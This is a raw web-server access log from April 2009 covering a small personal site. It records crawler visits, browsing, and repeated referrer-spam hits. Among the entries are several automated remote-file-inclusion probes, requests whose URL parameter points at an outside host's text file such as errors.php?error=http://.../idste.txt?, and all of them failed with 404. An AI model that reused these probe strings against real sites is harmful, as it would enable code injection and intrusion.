66.249.72.141 - - [22/Apr/2009:20:18:22 +0100] "GET /CAM1.swf HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 239 638
208.80.195.44 - - [22/Apr/2009:20:59:40 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; ZangoToolbar 4.8.2)" 183 1587
81.53.149.185 - - [22/Apr/2009:22:17:10 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.google.fr/search?q=quantum+mechanics+animations+filetype:swf&hl=fr&lr=&rlz=1B3GGGL_frFR272FR273&as_qdr=all&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 542 7503735
81.53.149.185 - - [22/Apr/2009:22:17:22 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 372 641
81.53.149.185 - - [22/Apr/2009:22:17:25 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" 402 641
124.115.1.7 - - [23/Apr/2009:00:01:49 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
67.202.41.3 - - [23/Apr/2009:00:08:26 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" 186 603
67.202.41.3 - - [23/Apr/2009:00:08:26 +0100] "GET / HTTP/1.0" 200 1266 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" 176 1587
58.61.164.141 - - [23/Apr/2009:01:02:45 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [23/Apr/2009:01:04:58 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [23/Apr/2009:01:05:02 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [23/Apr/2009:01:18:15 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [23/Apr/2009:01:53:37 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [23/Apr/2009:02:13:28 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
114.80.93.71 - - [23/Apr/2009:03:43:50 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [23/Apr/2009:11:06:06 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.72.141 - - [23/Apr/2009:11:06:06 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 146483 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 352 146845
220.181.61.234 - - [23/Apr/2009:20:34:39 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
66.249.72.141 - - [23/Apr/2009:20:52:02 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1625
66.249.72.141 - - [23/Apr/2009:21:45:33 +0100] "GET /log/error.log.3 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 296 255
72.30.65.56 - - [23/Apr/2009:22:52:07 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
72.30.65.56 - - [23/Apr/2009:22:52:07 +0100] "GET /log/error.log.5 HTTP/1.0" 200 364 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 425 686
77.88.26.26 - - [24/Apr/2009:03:25:23 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yandex/1.01.001 (compatible; Win16; I)" 155 641
77.88.26.26 - - [24/Apr/2009:03:25:23 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yandex/1.01.001 (compatible; Win16; I)" 450 1624
208.80.195.44 - - [24/Apr/2009:05:44:56 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {D051E3E9-5C89-44C1-A5C2-21DAE5F52904}; SV1; .NET CLR 1.1.4322)" 171 1587
124.115.4.194 - - [24/Apr/2009:05:48:12 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
58.61.164.207 - - [24/Apr/2009:06:43:21 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
66.249.72.141 - - [24/Apr/2009:07:13:40 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.72.141 - - [24/Apr/2009:07:13:40 +0100] "GET /o2.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 255
195.128.34.50 - - [24/Apr/2009:08:10:28 +0100] "GET /log/web.log/scanhttp://www.dloisvision.com//dotproject/functions/v4id.txt? HTTP/1.0" 404 420 "-" "libwww-perl/5.808" 273 704
195.128.34.50 - - [24/Apr/2009:08:10:28 +0100] "GET /scanhttp://www.dloisvision.com//dotproject/functions/v4id.txt? HTTP/1.0" 404 408 "-" "libwww-perl/5.808" 261 691
195.128.34.50 - - [24/Apr/2009:08:10:29 +0100] "GET /log/scanhttp://www.dloisvision.com//dotproject/functions/v4id.txt? HTTP/1.0" 404 412 "-" "libwww-perl/5.808" 265 695
220.181.61.234 - - [24/Apr/2009:08:27:50 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
83.142.86.130 - - [24/Apr/2009:09:41:16 +0100] "GET /log/errors.php?error=http://www.wg.com.pl/components/test.txt?? HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" 246 607
83.142.86.130 - - [24/Apr/2009:09:41:16 +0100] "GET /errors.php?error=http://www.wg.com.pl/components/test.txt?? HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" 242 603
66.249.72.141 - - [24/Apr/2009:11:05:19 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 148657 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 352 149020
58.241.255.38 - - [24/Apr/2009:13:44:14 +0100] "HEAD /log/wp-admin/index.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1" 156 225
58.241.255.38 - - [24/Apr/2009:13:44:15 +0100] "GET /log/ HTTP/1.1" 200 3184 "-" "Mozilla/4.0 (compatible; 6.0; Windows NT 5.1" 137 3418
72.30.65.56 - - [24/Apr/2009:18:10:49 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
72.30.65.56 - - [24/Apr/2009:18:10:51 +0100] "GET /log/error.log.2 HTTP/1.0" 200 2074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 425 2396
38.99.13.117 - - [24/Apr/2009:20:28:48 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
72.30.65.56 - - [25/Apr/2009:00:13:34 +0100] "GET /log/error.log HTTP/1.0" 200 126976 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 423 127303
66.249.72.141 - - [25/Apr/2009:00:27:46 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.72.141 - - [25/Apr/2009:00:27:46 +0100] "GET /log/error.log.5 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 296 254
66.249.72.141 - - [25/Apr/2009:00:34:55 +0100] "GET /log/?C=M;O=A HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 293 3456
66.249.72.141 - - [25/Apr/2009:01:45:10 +0100] "GET /log/web.log.4 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 255
219.234.81.33 - - [25/Apr/2009:04:47:08 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
219.234.81.33 - - [25/Apr/2009:04:47:11 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" 376 1587
124.115.4.194 - - [25/Apr/2009:05:15:01 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
66.235.124.4 - - [25/Apr/2009:07:01:08 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
66.235.124.4 - - [25/Apr/2009:07:01:23 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
124.115.1.7 - - [25/Apr/2009:07:32:18 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [25/Apr/2009:08:44:51 +0100] "GET /webalizer/ctry_usage_200805.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 259 254
58.61.164.141 - - [25/Apr/2009:08:47:07 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [25/Apr/2009:08:59:40 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [25/Apr/2009:09:00:43 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [25/Apr/2009:09:04:43 +0100] "GET /webalizer/hourly_usage_200805.png HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 261 254
58.61.164.140 - - [25/Apr/2009:09:07:21 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [25/Apr/2009:09:33:05 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [25/Apr/2009:09:34:59 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [25/Apr/2009:11:05:52 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 149537 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 352 149900
208.80.195.45 - - [25/Apr/2009:11:17:09 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; bgft; .NET CLR 1.1.4322)" 132 1587
72.30.65.56 - - [25/Apr/2009:14:01:04 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
72.30.65.56 - - [25/Apr/2009:14:01:04 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 410 1587
66.249.72.141 - - [25/Apr/2009:18:31:29 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.72.141 - - [25/Apr/2009:18:31:29 +0100] "GET /webalizer/usage_200608.html HTTP/1.1" 200 103878 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 104240
66.249.72.141 - - [25/Apr/2009:20:06:24 +0100] "GET /log/?C=M;O=D HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
66.249.72.141 - - [25/Apr/2009:20:29:35 +0100] "GET /yellowdrag2.swf HTTP/1.1" 404 362 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 246 646
66.249.72.141 - - [25/Apr/2009:20:48:05 +0100] "GET /webalizer/usage_200708.html HTTP/1.1" 200 145214 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 145578
66.249.72.141 - - [25/Apr/2009:21:01:59 +0100] "GET /log/?C=S;O=A HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
124.115.1.7 - - [26/Apr/2009:00:22:48 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
38.99.13.119 - - [26/Apr/2009:01:22:05 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
58.61.164.141 - - [26/Apr/2009:01:46:49 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [26/Apr/2009:01:51:48 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [26/Apr/2009:01:54:38 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [26/Apr/2009:01:59:33 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.72.141 - - [26/Apr/2009:02:30:05 +0100] "GET /webalizer/ HTTP/1.1" 200 11454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 291 11816
58.61.164.140 - - [26/Apr/2009:02:44:08 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
114.80.93.71 - - [26/Apr/2009:03:19:38 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.4.194 - - [26/Apr/2009:03:30:01 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
94.178.42.229 - - [26/Apr/2009:03:48:05 +0100] "GET / HTTP/1.1" 206 774 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" 504 1140
58.61.164.139 - - [26/Apr/2009:03:55:34 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
94.178.42.229 - - [26/Apr/2009:04:13:32 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 492 1634
94.178.42.229 - - [26/Apr/2009:04:37:06 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; SpamBlockerUtility 4.8.4)" 519 1634
94.178.42.229 - - [26/Apr/2009:04:59:06 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 488 1634
94.178.42.229 - - [26/Apr/2009:05:22:29 +0100] "GET / HTTP/1.1" 206 925 "http://ddpmall.com/Details-1yaself.html" "Opera/9.20 (Windows NT 5.1; U; en)" 437 1291
94.178.42.229 - - [26/Apr/2009:05:46:30 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11" 496 1634
94.178.42.229 - - [26/Apr/2009:06:10:25 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; IEMB3)" 507 1634
94.178.42.229 - - [26/Apr/2009:06:34:19 +0100] "GET / HTTP/1.1" 206 854 "http://ddpmall.com/Details-1yaself.html" "Opera/9.02 (Windows NT 5.1; U; en)" 437 1220
94.178.42.229 - - [26/Apr/2009:07:00:36 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 488 1634
94.178.42.229 - - [26/Apr/2009:07:26:00 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" 480 1634
94.178.42.229 - - [26/Apr/2009:07:53:01 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 473 1634
66.249.72.141 - - [26/Apr/2009:08:05:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Googlebot-Image/1.0" 205 641
66.249.72.141 - - [26/Apr/2009:08:05:44 +0100] "GET /hs05.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 236 254
94.178.42.229 - - [26/Apr/2009:08:21:23 +0100] "GET / HTTP/1.1" 206 1147 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20051128 Netscape/8.0.4" 491 1515
94.178.42.229 - - [26/Apr/2009:08:52:04 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20070321 Netscape/8.1.3" 491 1634
94.178.42.229 - - [26/Apr/2009:09:24:15 +0100] "GET / HTTP/1.1" 206 1153 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20051128 Netscape/8.0.4" 491 1521
94.178.42.229 - - [26/Apr/2009:09:58:35 +0100] "GET / HTTP/1.1" 206 694 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; SpamBlockerUtility 4.8.4)" 518 1060
94.178.42.229 - - [26/Apr/2009:10:33:51 +0100] "GET / HTTP/1.1" 206 1174 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20070321 Netscape/8.1.3" 491 1542
66.249.72.141 - - [26/Apr/2009:11:05:46 +0100] "GET /webalizer/usage_200904.html HTTP/1.1" 200 150820 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 151183
94.178.42.229 - - [26/Apr/2009:11:10:38 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Crazy Browser 2.0.1)" 514 1634
94.178.42.229 - - [26/Apr/2009:12:20:50 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 516 1634
94.178.42.229 - - [26/Apr/2009:13:03:41 +0100] "GET / HTTP/1.1" 206 1221 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3; IEMB3)" 487 1589
91.195.124.10 - - [26/Apr/2009:14:10:49 +0100] "GET //errors.php?error=http://www.hskshop.de/components/com_poll/views/poll/tmpl/idste.txt? HTTP/1.1" 404 357 "-" "libwww-perl/5.805" 207 603
83.103.72.130 - - [26/Apr/2009:14:14:19 +0100] "GET /errors.php?error=http://www.erstewahlautoteile.de//components/com_virtuemart/idk.txt???? HTTP/1.1" 404 357 "-" "libwww-perl/5.79" 208 603
94.178.42.229 - - [26/Apr/2009:14:19:49 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)" 513 1634
91.195.124.10 - - [26/Apr/2009:14:20:23 +0100] "GET /log/error.log//errors.php?error=http://www.hskshop.de/components/com_poll/views/poll/tmpl/idste.txt? HTTP/1.1" 404 372 "-" "libwww-perl/5.805" 221 618
91.195.124.10 - - [26/Apr/2009:14:20:24 +0100] "GET //errors.php?error=http://www.hskshop.de/components/com_poll/views/poll/tmpl/idste.txt? HTTP/1.1" 404 357 "-" "libwww-perl/5.805" 207 603
91.195.124.10 - - [26/Apr/2009:14:20:24 +0100] "GET /log//errors.php?error=http://www.hskshop.de/components/com_poll/views/poll/tmpl/idste.txt? HTTP/1.1" 404 362 "-" "libwww-perl/5.805" 211 608
83.103.72.130 - - [26/Apr/2009:14:30:51 +0100] "GET /log/web.log/errors.php?error=http://www.erstewahlautoteile.de//components/com_virtuemart/idk.txt???? HTTP/1.1" 404 369 "-" "libwww-perl/5.79" 220 615
83.103.72.130 - - [26/Apr/2009:14:30:51 +0100] "GET /errors.php?error=http://www.erstewahlautoteile.de//components/com_virtuemart/idk.txt???? HTTP/1.1" 404 357 "-" "libwww-perl/5.79" 208 603
83.103.72.130 - - [26/Apr/2009:14:30:51 +0100] "GET /log/errors.php?error=http://www.erstewahlautoteile.de//components/com_virtuemart/idk.txt???? HTTP/1.1" 404 361 "-" "libwww-perl/5.79" 212 607
94.178.42.229 - - [26/Apr/2009:14:46:50 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.3.04b)" 508 1634
38.99.13.120 - - [26/Apr/2009:15:11:40 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 189 1587
94.178.42.229 - - [26/Apr/2009:15:12:05 +0100] "GET / HTTP/1.1" 206 774 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.3.04b)" 507 1140
94.178.0.170 - - [26/Apr/2009:15:42:02 +0100] "GET / HTTP/1.1" 206 1177 "http://ddpmall.com/Details-1yaself.html" "Opera/9.02 (Windows NT 5.1; U; en)" 438 1545
94.178.0.170 - - [26/Apr/2009:15:57:15 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 516 1634
94.178.0.170 - - [26/Apr/2009:15:58:31 +0100] "GET / HTTP/1.1" 206 828 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" 477 1194
94.178.0.170 - - [26/Apr/2009:15:59:59 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yplus 5.3.04b)" 508 1634
94.178.0.170 - - [26/Apr/2009:16:01:52 +0100] "GET / HTTP/1.1" 206 1111 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" 501 1479
94.178.0.170 - - [26/Apr/2009:16:02:48 +0100] "GET / HTTP/1.1" 206 1203 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)" 513 1571
91.205.124.11 - - [26/Apr/2009:16:09:59 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 344 584
91.205.124.11 - - [26/Apr/2009:16:09:59 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 334 1568
208.80.195.39 - - [26/Apr/2009:16:32:11 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; HanseNet DSL; .NET CLR 1.1.4322)" 140 1587
72.30.65.56 - - [26/Apr/2009:17:15:15 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
72.30.65.56 - - [26/Apr/2009:17:15:16 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 421 1140
94.178.0.170 - - [26/Apr/2009:17:38:23 +0100] "GET / HTTP/1.1" 206 777 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 479 1143
94.178.0.170 - - [26/Apr/2009:17:57:11 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" 494 1634
94.178.0.170 - - [26/Apr/2009:18:00:10 +0100] "GET / HTTP/1.1" 206 1266 "http://ddpmall.com/Details-1yaself.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3; IEMB3)" 507 1634
88.131.106.11 - - [26/Apr/2009:18:01:46 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 199 603
88.131.106.11 - - [26/Apr/2009:18:01:49 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" 200 1140
